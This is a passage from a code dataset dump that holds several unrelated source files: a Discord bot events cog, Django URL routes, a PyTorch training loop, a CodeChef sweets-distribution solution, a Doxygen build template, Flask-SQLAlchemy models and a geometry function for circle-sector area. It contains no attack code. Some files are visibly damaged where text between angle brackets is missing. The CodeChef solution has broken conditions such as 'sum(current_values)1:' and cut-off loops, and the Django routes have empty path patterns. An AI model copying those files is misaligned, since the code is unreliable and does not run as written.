i.click()\n\n","sub_path":"page/QQpage.py","file_name":"QQpage.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"256221263","text":"import discord\nfrom discord.ext import commands, tasks\nimport helpers.log as log\nimport helpers.utilityfunctions as util\nfrom helpers import emojis\nimport data.database as db\nimport re\nimport random\nimport asyncio\n\nlogger = log.get_logger(__name__)\ncommand_logger = log.get_command_logger()\n\n\nclass Events(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.stfu_regex = re.compile(r\"(?:^|\\W){0}(?:$|\\W)\".format(\"stfu\"), flags=re.IGNORECASE)\n self.statuses 
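BaseResnetBlock above implements a bottleneck residual: project the features down to outdim//4, run the inner convolutions, project back up, and add a resized shortcut. Stripped of the torch_geometric plumbing, the pattern reduces to the sketch below (illustrative only; nn.Linear stands in for the abstract convs() step):

import torch
from torch import nn

class BottleneckResidual(nn.Module):
    """Standalone sketch of the down-project / transform / up-project / shortcut pattern."""
    def __init__(self, indim, outdim):
        super().__init__()
        self.down = nn.Linear(indim, outdim // 4)        # features_downsample_nn
        self.inner = nn.Linear(outdim // 4, outdim // 4)  # stands in for convs()
        self.up = nn.Linear(outdim // 4, outdim)          # features_upsample_nn
        self.shortcut = nn.Linear(indim, outdim)          # shortcut_feature_resize_nn

    def forward(self, x):
        return self.shortcut(x) + self.up(self.inner(self.down(x)))

block = BottleneckResidual(32, 64)
print(block(torch.randn(10, 32)).shape)  # torch.Size([10, 64])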
= [\n (\"watching\", lambda: f\"{len(self.bot.guilds)} servers\"),\n (\"listening\", lambda: f\"{len(set(self.bot.get_all_members()))} users\"),\n (\"playing\", lambda: \"misobot.xyz\"),\n ]\n self.activities = {\"playing\": 0, \"streaming\": 1, \"listening\": 2, \"watching\": 3}\n self.current_status = None\n self.status_loop.start()\n self.guildlog = 652916681299066900\n\n def cog_unload(self):\n self.status_loop.cancel()\n\n @commands.Cog.listener()\n async def on_command_completion(self, ctx):\n \"\"\"Runs when any command is completed successfully.\"\"\"\n # prevent double invocation for subcommands\n if ctx.invoked_subcommand is None:\n command_logger.info(log.log_command(ctx))\n db.log_command_usage(ctx)\n\n @commands.Cog.listener()\n async def on_ready(self):\n \"\"\"Runs when the bot connects to the discord servers.\"\"\"\n latencies = self.bot.latencies\n logger.info(f\"Loading complete | running {len(latencies)} shards\")\n for shard_id, latency in latencies:\n logger.info(f\"Shard [{shard_id}] - HEARTBEAT {latency}s\")\n\n @tasks.loop(minutes=3.0)\n async def status_loop(self):\n try:\n await self.next_status()\n except Exception as e:\n logger.error(e)\n\n @status_loop.before_loop\n async def before_status_loop(self):\n await self.bot.wait_until_ready()\n await asyncio.sleep(30) # avoid rate limit from discord in case of rapid reconnect\n logger.info(\"Starting status loop\")\n\n async def next_status(self):\n \"\"\"Switch to the next status message.\"\"\"\n new_status_id = self.current_status\n while new_status_id == self.current_status:\n new_status_id = random.randrange(0, len(self.statuses))\n\n status = self.statuses[new_status_id]\n self.current_status = new_status_id\n\n await self.bot.change_presence(\n activity=discord.Activity(\n type=discord.ActivityType(self.activities[status[0]]), name=status[1]()\n )\n )\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild):\n \"\"\"Called when bot joins a new guild.\"\"\"\n logger.info(f\"New guild : {guild}\")\n content = discord.Embed(color=discord.Color.green())\n content.title = \"New guild!\"\n content.description = (\n f\"Miso just joined **{guild}**\\nWith **{guild.member_count-1}** members\"\n )\n content.set_thumbnail(url=guild.icon_url)\n content.set_footer(text=f\"#{guild.id}\")\n logchannel = self.bot.get_channel(self.guildlog)\n await logchannel.send(embed=content)\n\n @commands.Cog.listener()\n async def on_guild_remove(self, guild):\n \"\"\"Called when bot leaves a guild.\"\"\"\n logger.info(f\"Left guild : {guild}\")\n content = discord.Embed(color=discord.Color.red())\n content.title = \"Left guild!\"\n content.description = (\n f\"Miso just left **{guild}**\\nWith **{guild.member_count-1}** members :(\"\n )\n content.set_thumbnail(url=guild.icon_url)\n content.set_footer(text=f\"#{guild.id}\")\n logchannel = self.bot.get_channel(self.guildlog)\n await logchannel.send(embed=content)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n \"\"\"Called when a new member joins a guild.\"\"\"\n channel_id = db.get_setting(member.guild.id, \"welcome_channel\")\n if channel_id is not None:\n channel = member.guild.get_channel(channel_id)\n if channel is None:\n logger.warning(f\"Cannot welcome {member} to {member.guild.name} (invalid channel)\")\n else:\n message_format = db.get_setting(member.guild.id, \"welcome_message\")\n if message_format is None:\n message_format = \"Welcome **{username}** {mention} to **{server}**\"\n\n try:\n if db.get_setting(member.guild.id, \"welcome_embed\") == 0:\n await channel.send(\n util.create_welcome_without_embed(member, member.guild, message_format)\n )\n else:\n await channel.send(\n embed=util.create_welcome_embed(member, member.guild, message_format)\n )\n except discord.errors.Forbidden:\n pass\n\n # add autorole\n role = member.guild.get_role(db.get_setting(member.guild.id, \"autorole\"))\n if role is not None:\n try:\n await member.add_roles(role)\n except discord.errors.Forbidden:\n logger.error(\n f\"Trying to add autorole failed in {member.guild.name} (no permissions)\"\n )\n\n @commands.Cog.listener()\n async def on_member_ban(self, guild, user):\n \"\"\"Called when user gets banned from a server.\"\"\"\n channel_id = db.get_setting(guild.id, \"bans_channel\")\n if channel_id is None:\n return\n\n channel = guild.get_channel(channel_id)\n if channel is None:\n return logger.warning(\n f\"Cannot announce ban of {user} from {guild.name} (invalid channel)\"\n )\n\n try:\n await channel.send(f\":hammer: **{user}** (`{user.id}`) has just been banned\")\n except discord.errors.Forbidden:\n pass\n\n @commands.Cog.listener()\n async def on_member_remove(self, member):\n \"\"\"Called when member leaves a guild.\"\"\"\n channel_id = db.get_setting(member.guild.id, \"goodbye_channel\")\n if channel_id is None:\n return\n\n channel = member.guild.get_channel(channel_id)\n if channel is None:\n return logger.warning(\n f\"Cannot say goodbye to {member} from {member.guild.name} (invalid channel)\"\n )\n\n message_format = db.get_setting(member.guild.id, \"goodbye_message\")\n if message_format is None:\n message_format = \"Goodbye {mention} ( **{user}** )\"\n\n try:\n await channel.send(util.create_goodbye_message(member, member.guild, message_format))\n except discord.errors.Forbidden:\n pass\n\n @commands.Cog.listener()\n async def on_message_delete(self, message):\n \"\"\"Listener that gets called when any message is deleted.\"\"\"\n # ignore bots\n if message.author.bot:\n return\n\n # ignore DMs\n if message.guild is None:\n return\n\n # ignore empty messages\n if len(message.content) == 0 and len(message.attachments) == 0:\n return\n\n # ignored channels\n if (\n db.query(\n \"select * from deleted_messages_mask where channel_id = ?\", (message.channel.id,),\n )\n is not None\n ):\n return\n\n channel_id = db.get_setting(message.guild.id, \"deleted_messages_channel\")\n if channel_id is None:\n return\n\n channel = message.guild.get_channel(channel_id)\n if channel is None or message.channel == channel:\n return\n\n try:\n await channel.send(embed=util.message_embed(message))\n except discord.errors.Forbidden:\n pass\n\n @commands.Cog.listener()\n async def on_message(self, message):\n \"\"\"Listener that gets called on every message.\"\"\"\n # make sure cache is ready\n if not self.bot.is_ready():\n return\n\n # ignore DMs\n if message.guild is None:\n return\n\n # votechannels\n\n data = db.query(\n \"\"\"SELECT channeltype FROM votechannels\n WHERE guild_id = ? 
and channel_id = ?\"\"\",\n (message.guild.id, message.channel.id),\n )\n if data is not None:\n if data[0][0] == \"rating\":\n for e in [\"0️⃣\", \"1️⃣\", \"2️⃣\", \"3️⃣\", \"4️⃣\", \"5️⃣\"]:\n await message.add_reaction(e)\n else:\n await message.add_reaction(emojis.UPVOTE)\n await message.add_reaction(emojis.DOWNVOTE)\n\n # xp gain\n message_xp = util.xp_from_message(message)\n currenthour = message.created_at.hour\n db.add_activity(message.guild.id, message.author.id, message_xp, currenthour)\n\n # if bot account, ignore everything after this\n if message.author.bot:\n return\n\n if db.get_setting(message.guild.id, \"autoresponses\") == 1:\n await self.easter_eggs(message)\n\n # log emojis\n unicode_emojis = util.find_unicode_emojis(message.content)\n custom_emojis = util.find_custom_emojis(message.content)\n if unicode_emojis or custom_emojis:\n db.log_emoji_usage(message, custom_emojis, unicode_emojis)\n\n # level up message\n announce = db.get_setting(message.guild.id, \"levelup_toggle\")\n if announce != 0:\n activity_data = db.get_user_activity(message.guild.id, message.author.id)\n if activity_data is None:\n return\n\n xp = sum(activity_data)\n level_before = util.get_level(xp - message_xp)\n level_now = util.get_level(xp)\n\n if level_now > level_before:\n try:\n await message.channel.send(\n f\"{message.author.mention} just leveled up! (level **{level_now}**)\",\n delete_after=5,\n )\n except discord.errors.Forbidden:\n pass\n\n async def easter_eggs(self, message):\n \"\"\"Easter eggs handler.\"\"\"\n # stfu\n if self.stfu_regex.findall(message.content) and random.randint(0, 1) == 0:\n try:\n await message.channel.send(\"no u\")\n except discord.errors.Forbidden:\n pass\n\n stripped_content = message.content.lower().strip(\"!.?~ \")\n\n # hi\n if stripped_content == \"hi\" and random.randint(0, 19) == 0:\n try:\n await message.channel.send(\"hi\")\n except discord.errors.Forbidden:\n pass\n\n # hello there\n elif stripped_content == \"hello there\" and random.randint(0, 2) == 0:\n try:\n await message.channel.send(\"General Kenobi\")\n except discord.errors.Forbidden:\n pass\n\n # git gud\n if message.content.lower().startswith(\"git \"):\n gitcommand = re.search(r\"git (\\S+)\", message.content)\n if gitcommand is None:\n return\n gitcommand = gitcommand.group(1)\n if gitcommand == \"--help\":\n msg = (\n \"```\\n\"\n \"usage: git [--version] [--help] [-C ] [-c =]\\n\"\n \" [--exec-path[=]] [--html-path] [--man-path] [--info-path]\\n\"\n \" [-p | --paginate | --no-pager] [--no-replace-objects] [--bare]\\n\"\n \" [--git-dir=] [--work-tree=] [--namespace=]\\n\"\n \" []```\"\n )\n elif gitcommand == \"--version\":\n msg = \"`git version 2.17.1`\"\n elif gitcommand in [\n \"commit\",\n \"push\",\n \"pull\",\n \"checkout\",\n \"status\",\n \"init\",\n \"add\",\n ]:\n return\n else:\n msg = f\"`git: '{gitcommand}' is not a git command. 
See 'git --help'.`\"\n\n try:\n await message.channel.send(msg)\n except discord.errors.Forbidden:\n pass\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload):\n \"\"\"Starboard event handler.\"\"\"\n starboard_settings = db.query(\n \"\"\"\n SELECT starboard_toggle, starboard_amount, starboard_channel, starboard_emoji, starboard_emoji_is_custom\n FROM guilds WHERE guild_id = ?\"\"\",\n (payload.guild_id,),\n )\n if starboard_settings is None:\n return\n else:\n starboard_settings = starboard_settings[0]\n\n if not util.int_to_bool(starboard_settings[0]):\n return\n\n custom_emoji = False\n if starboard_settings[3] is None:\n star_emoji = \"⭐\"\n else:\n star_emoji = starboard_settings[3]\n if starboard_settings[4] == 1:\n custom_emoji = True\n\n is_correct = False\n if custom_emoji and payload.emoji.id == int(star_emoji):\n is_correct = True\n elif payload.emoji.name == star_emoji:\n is_correct = True\n\n if is_correct:\n channel = self.bot.get_channel(payload.channel_id)\n if channel.id == starboard_settings[2]:\n # trying to star a starboard message\n return\n\n message = await channel.fetch_message(payload.message_id)\n for react in message.reactions:\n if custom_emoji:\n if (\n isinstance(react.emoji, (discord.Emoji, discord.PartialEmoji))\n and react.emoji.id == payload.emoji.id\n ):\n reaction_count = react.count\n break\n else:\n if react.emoji == payload.emoji.name:\n reaction_count = react.count\n break\n\n if reaction_count < starboard_settings[1]:\n return\n\n channel_id = starboard_settings[2]\n channel = payload.member.guild.get_channel(channel_id)\n if channel is None:\n return\n\n board_msg_id = db.query(\n \"\"\"SELECT starboard_message_id FROM starboard WHERE message_id = ?\"\"\",\n (payload.message_id,),\n )\n reaction_emoji = star_emoji if not custom_emoji else \"⭐\"\n\n board_message = None\n if board_msg_id is not None:\n board_msg_id = board_msg_id[0][0]\n if board_msg_id is not None:\n try:\n board_message = await channel.fetch_message(board_msg_id)\n except discord.errors.NotFound:\n board_message = None\n\n if board_message is None:\n # message is not on board yet, or it was deleted\n content = discord.Embed(color=discord.Color.gold())\n content.set_author(name=f\"{message.author}\", icon_url=message.author.avatar_url)\n jump = f\"\\n\\n[context]({message.jump_url})\"\n content.description = message.content[: 2048 - len(jump)] + jump\n content.timestamp = message.created_at\n content.set_footer(\n text=f\"{reaction_count} {reaction_emoji} #{message.channel.name}\"\n )\n if len(message.attachments) > 0:\n content.set_image(url=message.attachments[0].url)\n\n try:\n board_message = await channel.send(embed=content)\n db.execute(\n \"REPLACE INTO starboard VALUES(?, ?)\",\n (payload.message_id, board_message.id),\n )\n except discord.errors.Forbidden:\n logger.warning(\n f\"Unable to send message to starboard in {channel.guild} due to missing permissions!\"\n )\n\n else:\n # message is on board, update star count\n content = board_message.embeds[0]\n content.set_footer(\n text=f\"{reaction_count} {reaction_emoji} #{message.channel.name}\"\n )\n await board_message.edit(embed=content)\n\n\ndef setup(bot):\n bot.add_cog(Events(bot))\n","sub_path":"cogs/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":16632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"476683235","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'inventory'\n\nurlpatterns = [\n path(\"\", views.item_list, name=\"item_list\"),\n # path(\"amount/\", views.amount_ajax, name=\"amount_ajax\"),\n path(\"/\", views.item_read, name=\"item_read\"),\n path(\"create/\", views.item_create, name=\"item_create\"),\n path(\"update//\", views.item_update, name=\"item_update\"),\n path(\"delete//\", views.item_delete, name=\"item_delete\"),\n\n path(\"account/\", views.account_list, name=\"account_list\"),\n path(\"account//\", views.account_read, name=\"account_read\"),\n path(\"account/create/\", views.account_create, name=\"account_create\"),\n path(\"account/update//\", views.account_update, name=\"account_update\"),\n path(\"account/delete//\", views.account_delete, name=\"account_delete\"),\n]","sub_path":"inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"142533922","text":"import time\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom copy import deepcopy\nimport numpy as np\nimport numpy.ma as ma\nimport pickle as pkl\nfrom sklearn.metrics import mean_absolute_error\nfrom scipy.stats import pearsonr\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\n\n\nclass Trainer:\n def __init__(self, num_epochs, early_stop_tolerance, clip, optimizer,\n learning_rate, weight_decay, momentum, device):\n\n self.num_epochs = num_epochs\n self.clip = clip\n self.optimizer = optimizer\n self.momentum = momentum\n self.weight_decay = weight_decay\n self.learning_rate = learning_rate\n self.tolerance = early_stop_tolerance\n self.device = torch.device(device)\n self.criterion = nn.MSELoss()\n\n def fit(self, model, batch_generator):\n\n model = model.to(self.device)\n model.train()\n\n if model.is_trainable:\n\n if self.optimizer == \"adam\":\n optimizer = optim.Adam(model.parameters(),\n lr=self.learning_rate)\n else:\n\n optimizer = optim.SGD(model.parameters(),\n lr=self.learning_rate,\n momentum=self.momentum)\n else:\n optimizer = None\n\n lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode=\"min\", factor=0.5, patience=4)\n\n train_loss = []\n val_loss = []\n tolerance = 0\n best_val_loss = 1e6\n best_epoch = 0\n evaluation_val_loss = best_val_loss\n best_dict = model.state_dict()\n\n for epoch in range(self.num_epochs):\n # train and validation loop\n start_time = time.time()\n\n # train\n running_train_loss = self.__step_loop(model=model,\n generator=batch_generator,\n mode='train',\n optimizer=optimizer)\n\n # validation\n running_val_loss = self.__step_loop(model=model,\n generator=batch_generator,\n mode='val',\n optimizer=None)\n\n lr_scheduler.step(running_val_loss)\n\n epoch_time = time.time() - start_time\n\n message_str = \"\\nEpoch: {}, Train_loss: {:.5f}, Validation_loss: {:.5f}, Took {:.3f} seconds.\"\n print(message_str.format(epoch + 1, running_train_loss, running_val_loss, epoch_time))\n\n # save the losses\n train_loss.append(running_train_loss)\n val_loss.append(running_val_loss)\n\n if running_val_loss < best_val_loss:\n best_epoch = epoch + 1\n best_val_loss = running_val_loss\n best_dict = deepcopy(model.state_dict())\n tolerance = 0\n else:\n tolerance += 1\n\n if tolerance > self.tolerance or epoch == self.num_epochs - 1:\n model.load_state_dict(best_dict)\n\n evaluation_val_loss = self.__step_loop(model=model,\n generator=batch_generator,\n mode='val',\n optimizer=None)\n\n message_str = \"Early exiting from epoch: {}, Validation error: {:.5f}.\"\n print(message_str.format(best_epoch, evaluation_val_loss))\n break\n\n torch.cuda.empty_cache()\n\n print('Train finished, best eval loss: {:.5f}'.format(evaluation_val_loss))\n return train_loss, val_loss, evaluation_val_loss\n\n def transform(self, model, batch_generator):\n\n test_loss = self.__step_loop(model=model,\n generator=batch_generator,\n mode='test',\n optimizer=None,\n )\n print('Test finished, best eval loss: {:.5f}'.format(test_loss))\n\n return test_loss\n\n def __step_loop(self, model, generator, mode, optimizer):\n running_loss = 0\n batch_size = generator.dataset_params['batch_size']\n\n if mode in ['test', 'val']:\n step_fun = self.__val_step\n else:\n step_fun = self.__train_step\n idx = 0\n\n for idx, (x, y, f_x) in enumerate(generator.generate(mode)):\n print('\\r{}:{}/{}'.format(mode, idx, generator.num_iter(mode)),flush=True, end='')\n\n if hasattr(model, 'hidden'):\n hidden = model.init_hidden(batch_size)\n else:\n hidden = None\n\n x, y = [self.__prep_input(i) for i in [x, y]]\n\n loss = step_fun(model=model,\n inputs=[x, y, f_x.float().to(self.device), hidden],\n optimizer=optimizer,\n generator=generator,\n )\n running_loss += loss\n\n return running_loss\n\n def __train_step(self, model, inputs, optimizer, generator):\n\n x, y, f_x, hidden = inputs\n\n pred = model.forward(x=x, f_x=f_x, hidden=hidden)\n loss = self.criterion(pred, y)\n\n if model.is_trainable:\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), self.clip)\n optimizer.step()\n\n if generator.normalizer:\n pred = generator.normalizer.inv_norm(pred, self.device)\n\n y = generator.normalizer.inv_norm(y, self.device)\n\n de_norm_loss = self.criterion(pred, y)\n de_norm_loss = de_norm_loss.detach().cpu().numpy()\n loss = loss.detach().cpu().numpy()\n print(f\" loss: {de_norm_loss}\")\n\n return de_norm_loss\n\n def __val_step(self, model, inputs, optimizer, generator):\n\n x, y, f_x, hidden = inputs\n pred = model.forward(x=x, f_x=f_x, hidden=hidden)\n if generator.normalizer:\n pred = generator.normalizer.inv_norm(pred, self.device)\n y = generator.normalizer.inv_norm(y, self.device)\n loss = self.criterion(pred, y)\n return loss.detach().cpu().numpy()\n\n def __prep_input(self, x):\n x = x.float().to(self.device)\n # (b, t, m, n, d) -> (b, t, d, m, n)\n x = x.permute(0, 1, 4, 2, 3)\n return x\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"303454812","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 10 10:18:09 2021\r\n\r\n@author: Parvish\r\n\"\"\"\r\n\r\n# Code Chef Challenge - CHEFMAS\r\n\r\nfrom itertools import permutations \r\n\r\ndef unique(l):\r\n unique_list = []\r\n for x in l:\r\n if x not in unique_list:\r\n unique_list.append(x)\r\n return unique_list\r\n\r\ndef recursiveDistribution(ls,maxSweets,current_values,flag,sweets,temp_values,distribution):\r\n if(len(ls[flag:])>1):\r\n for i in ls[flag:flag+1]:\r\n test_values=temp_values[:]\r\n for k in range(maxSweets,0,-1):\r\n if sum(current_values)1:\r\n for j in i[flag:flag+1]:\r\n for k in range(maxSweets,0,-1):\r\n if sum(current_values)100:\r\n raise Exception('Test cases should be between 0 to 100')\r\n output=[]\r\n for i in range(0,tc):\r\n \r\n sweets,children=input().split(' ')\r\n children=int(children)\r\n sweets=int(sweets)\r\n\r\n if((children<1 or children>sweets or children>pow(10,5)) or (sweets<1 or 
sweets>pow(10,5))):\r\n raise Exception('Children and sweets must be in following format, 1<=children<=sweets<=10^5')\r\n \r\n ac_list=input().split(' ',maxsplit=children)\r\n \r\n if len(ac_list)>children:\r\n ac_list.pop(children)\r\n \r\n ac_list = [int(i) for i in ac_list] \r\n \r\n for i in ac_list:\r\n if i>pow(10,5) or i<0:\r\n raise Exception('Goodness count must be between 0 to 10^5')\r\n \r\n if sum(ac_list)>sweets:\r\n output.append(0)\r\n \r\n elif sum(ac_list)==sweets:\r\n output.append(1)\r\n \r\n else:\r\n current_values=ac_list[:]\r\n distribution=[]\r\n index_combination=[]\r\n indexes=[idx for idx,val in enumerate(current_values)]\r\n \r\n for i in range(1,len(current_values)+1):\r\n perm = permutations(indexes, i)\r\n for i in list(perm):\r\n index_combination.append(i)\r\n\r\n recursiveDistributionCaller(index_combination,sweets,current_values,distribution,ac_list)\r\n distributed_probability=unique(distribution)\r\n output.append(len(distributed_probability))\r\n \r\n for i in output:\r\n print(i)\r\n \r\n except Exception as e:\r\n print(e)\r\n \r\nmain()","sub_path":"chocolate-distribution-problem.py","file_name":"chocolate-distribution-problem.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"361029494","text":"pkgname = \"doxygen\"\npkgver = \"1.9.7\"\npkgrel = 0\nbuild_style = \"cmake\"\nhostmakedepends = [\"cmake\", \"ninja\", \"perl\", \"python\", \"flex\", \"bison\"]\ncheckdepends = [\"libxml2-progs\"]\npkgdesc = \"Source code documentation generator tool\"\nmaintainer = \"q66 \"\nlicense = \"GPL-2.0-only\"\nurl = \"https://doxygen.nl\"\nsource = f\"{url}/files/{pkgname}-{pkgver}.src.tar.gz\"\nsha256 = \"87007641c38e2c392c8596f36711eb97633b984c8430f389e7bcf6323a098d94\"\nhardening = [\"vis\", \"cfi\"]\n\n\ndef post_extract(self):\n # needs texlive stuff\n self.rm(\"testing/012_cite.dox\")\n\n\ndef post_install(self):\n self.install_man(\"doc/doxygen.1\")\n","sub_path":"main/doxygen/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"251733634","text":"from application import db\n\nclass ShoppingList(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n items = db.relationship('Items', backref='shopping_list',\n lazy='dynamic')\n\nclass Items(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n description = db.Column(db.String(255))\n list_id = db.Column(db.Integer, db.ForeignKey('shopping_list.id'))\n\n def __repr__(self):\n return self.description\n","sub_path":"application/shopping_list/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"133523894","text":"import math\n\ndef getLineParameters(x1, y1, x2, y2):\n a = y1 - y2\n b = x2 - x1\n c = x1 * y2 - x2 * y1\n\n return (a, b, c)\n\ndef calcArea(x, y, r, p, q, a, t, changeBaseAngle):\n area_circle = math.pi*r*r\n\n l = 10\n ang_a = a + t/2\n pa = p + l * math.cos(math.radians(ang_a))\n qa = q + l * math.sin(math.radians(ang_a))\n\n while ang_a > 180:\n ang_a = ang_a - 360\n\n ang_b = a - t/2\n pb = p + l * math.cos(math.radians(ang_b))\n qb = q + l * math.sin(math.radians(ang_b))\n\n while ang_b > 180:\n ang_b = ang_b - 360\n\n if ang_a < ang_b:\n ang_a = ang_a + 360\n\n # Line A\n 
la_a, la_b, la_c = getLineParameters(p, q, pa, qa)\n dist_a = ((abs(la_a * x + la_b * y + la_c)) / math.sqrt(la_a * la_a + la_b * la_b))\n\n # Line B\n lb_a, lb_b, lb_c = getLineParameters(p, q, pb, qb)\n dist_b = ((abs(lb_a * x + lb_b * y + lb_c)) / math.sqrt(lb_a * lb_a + lb_b * lb_b))\n\n # Line BASE\n line_a, line_b, line_c = getLineParameters(p, q, x, y)\n if line_b != 0:\n ang_base = math.degrees(math.atan(-line_a/line_b))\n else:\n ang_base = 0.0\n\n if ang_base < 0 and q < y:\n ang_base = ang_base + 180\n elif ang_base > 0 and q > y:\n ang_base = ang_base - 180\n elif p > x:\n ang_base = 180\n\n if ang_base < 0 and changeBaseAngle:\n ang_base = ang_base + 360\n elif ang_base > 0 and changeBaseAngle:\n ang_base = ang_base - 360\n \n selected_a1 = None\n selected_a2 = None\n selected_b1 = None\n selected_b2 = None\n\n if dist_a < r:\n h_a = r - dist_a\n area_a = math.pow(r, 2) * math.acos((r-h_a)/r) - (r - h_a) * math.sqrt(2*r*h_a - math.pow(h_a, 2))\n\n # Solve for line A\n eq_a_a = 1 + math.pow(la_a, 2)/math.pow(la_b, 2)\n eq_a_b = -2*x + 2*la_a*la_c/(math.pow(la_b, 2))+2*la_a*y/la_b\n eq_a_c = math.pow(x, 2) + math.pow(la_c, 2)/math.pow(la_b, 2) + 2*la_c*y/la_b + math.pow(y, 2) - math.pow(r, 2)\n\n solve_a_x1 = (-eq_a_b + math.sqrt(math.pow(eq_a_b, 2) - 4*eq_a_a*eq_a_c))/(2*eq_a_a)\n solve_a_x2 = (-eq_a_b - math.sqrt(math.pow(eq_a_b, 2) - 4*eq_a_a*eq_a_c))/(2*eq_a_a)\n\n solve_a_y1 = -la_a * solve_a_x1 / la_b - la_c/la_b\n solve_a_y2 = -la_a * solve_a_x2 / la_b - la_c/la_b\n\n if pa > p and solve_a_x1 > p:\n selected_a1 = (solve_a_x1, solve_a_y1)\n elif pa < p and solve_a_x1 < p:\n selected_a1 = (solve_a_x1, solve_a_y1)\n elif qa > q and solve_a_y1 > q:\n selected_a1 = (solve_a_x1, solve_a_y1)\n elif qa < q and solve_a_y1 < q:\n selected_a1 = (solve_a_x1, solve_a_y1)\n \n if pa > p and solve_a_x2 > p:\n selected_a2 = (solve_a_x2, solve_a_y2)\n elif pa < p and solve_a_x2 < p:\n selected_a2 = (solve_a_x2, solve_a_y2)\n elif qa > q and solve_a_y2 > q:\n selected_a2 = (solve_a_x2, solve_a_y2)\n elif qa < q and solve_a_y2 < q:\n selected_a2 = (solve_a_x2, solve_a_y2)\n\n if dist_b < r:\n h_b = r - dist_b\n area_b = math.pow(r, 2) * math.acos((r-h_b)/r) - (r - h_b) * math.sqrt(2*r*h_b - math.pow(h_b, 2))\n\n # Solve for line B\n eq_b_a = 1 + math.pow(lb_a, 2)/math.pow(lb_b, 2)\n eq_b_b = -2*x + 2*lb_a*lb_c/(math.pow(lb_b, 2))+2*lb_a*y/lb_b\n eq_b_c = math.pow(x, 2) + math.pow(lb_c, 2)/math.pow(lb_b, 2) + 2*lb_c*y/lb_b + math.pow(y, 2) - math.pow(r, 2)\n\n solve_b_x1 = (-eq_b_b + math.sqrt(math.pow(eq_b_b, 2) - 4*eq_b_a*eq_b_c))/(2*eq_b_a)\n solve_b_x2 = (-eq_b_b - math.sqrt(math.pow(eq_b_b, 2) - 4*eq_b_a*eq_b_c))/(2*eq_b_a)\n\n solve_b_y1 = -lb_a * solve_b_x1 / lb_b - lb_c/lb_b\n solve_b_y2 = -lb_a * solve_b_x2 / lb_b - lb_c/lb_b\n\n if pb > p and solve_b_x1 > p:\n selected_b1 = (solve_b_x1, solve_b_y1)\n elif pb < p and solve_b_x1 < p:\n selected_b1 = (solve_b_x1, solve_b_y1)\n elif qb > q and solve_b_y1 > q:\n selected_b1 = (solve_b_x1, solve_b_y1)\n elif qb < q and solve_b_y1 < q:\n selected_b1 = (solve_b_x1, solve_b_y1)\n\n if pb > p and solve_b_x2 > p:\n selected_b2 = (solve_b_x2, solve_b_y2)\n elif pb < p and solve_b_x2 < p:\n selected_b2 = (solve_b_x2, solve_b_y2)\n elif qb > q and solve_b_y2 > q:\n selected_b2 = (solve_b_x2, solve_b_y2)\n elif qb < q and solve_b_y2 < q:\n selected_b2 = (solve_b_x2, solve_b_y2)\n\n # Distance from cannon to center of circle\n circle_distance = math.sqrt(math.pow(p-x, 2) + math.pow(q-y, 2))\n\n total_area = 0\n # Check if cannon is inside\n if circle_distance < r: \n segment_distance = math.sqrt(math.pow(selected_a1[0]-selected_b1[0], 2) + math.pow(selected_a1[1]-selected_b1[1], 2))\n angle_radian = 2 * math.asin(segment_distance/(2*r))\n area_segment = math.pow(r, 2)/2 * (angle_radian - math.sin(angle_radian))\n\n distance_a = math.sqrt(math.pow(selected_a1[0]-p, 2) + math.pow(selected_a1[1]-q, 2))\n distance_b = math.sqrt(math.pow(selected_b1[0]-p, 2) + math.pow(selected_b1[1]-q, 2))\n area_triangule = distance_a * distance_b/2\n total_area = area_triangule+area_segment\n # Check position of circle\n elif ang_base >= ang_a and dist_a < r:\n # Line A is a possible intersection\n # Check if intersection is valid\n if pa > p and p > solve_a_x1:\n total_area = 0.0\n elif pa < p and p < solve_a_x1:\n total_area = 0.0\n elif qa > q and q > solve_a_y1:\n total_area = 0.0\n elif qa < q and q < solve_a_y1:\n total_area = 0.0\n else:\n total_area = area_a\n\n if selected_b1 and selected_b2:\n total_area = total_area - area_b\n\n elif ang_base <= ang_b and dist_b < r:\n # Line B is a possible intersection\n # Check if intersection is valid\n if pb > p and p > solve_b_x1:\n total_area = 0.0\n elif pb < p and p < solve_b_x1:\n total_area = 0.0\n elif qb > q and q > solve_b_y1:\n total_area = 0.0\n elif qb < q and q < solve_b_y1:\n total_area = 0.0\n else:\n total_area = area_b\n\n if selected_a1 and selected_a2:\n total_area = total_area - area_a\n\n elif ang_base < ang_a and ang_base > ang_b:\n total_area = area_circle\n\n if dist_a < r:\n # Line A is an intersection\n total_area = total_area - area_a\n \n if dist_b < r:\n # Line B is an intersection\n total_area = total_area - area_b\n else:\n total_area = 0.0\n \n if False:\n print('Cannon points: ({:.1f}, {:.1f}), ({:.1f}, {:.1f}), ({:.1f}, {:.1f})'.format(p, q, pa, qa, pb, qb))\n print('Line: {:.1f}x + 